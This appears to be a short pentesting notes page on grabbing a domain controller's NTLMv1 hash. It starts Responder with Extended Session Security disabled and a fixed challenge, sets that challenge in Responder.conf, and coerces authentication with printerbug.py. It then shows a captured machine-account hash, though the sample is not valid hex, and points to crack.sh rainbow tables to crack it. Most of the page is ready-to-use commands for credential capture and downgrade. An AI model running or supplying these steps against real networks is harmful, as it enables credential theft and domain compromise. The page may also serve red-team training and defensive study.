Grabbing NTLMv1

If you are able to Coerce a system, you can usually grab its NTLMv1 and potentially downgrade it to a crackable format.

Start Responder listener:

sudo responder -I eth1 -A -v --disable-ess –ntlmchallenge 1122334455667788

This will make responder run with these flags:

-I eth1: Run on mentioned interface

-A: Analyze mode (no poison)

-v: verbose

--disable-ess: Disables Extended Session Security (ESS)

-ntlmchallenge: Sets a custom NTLM challenge, to make cracking easier

Set Responder config:

sudo nano /etc/responder/Responder.conf

; Custom challenge.
; Use "Random" for generating a random challenge for each requests (Default)
Challenge = 1122334455667788

Set challenge (since flag doesn't always work)

Coerce system:

python3 printerbug.py company.local/[email protected] 10.1.0.50

Captured:

DC01$::COMP:961F3DF11245212312367BC5459B8DE:961F3123BASASA467BC5459B8DE:1122334455667788

Note the '1122334455667788' that we set.

This NTLMv1 hash can be cracked within 24 hours using the service https://crack.sh/.

They have rainbow tables specifically for challenge 1122334455667788.

Last updated 9 months ago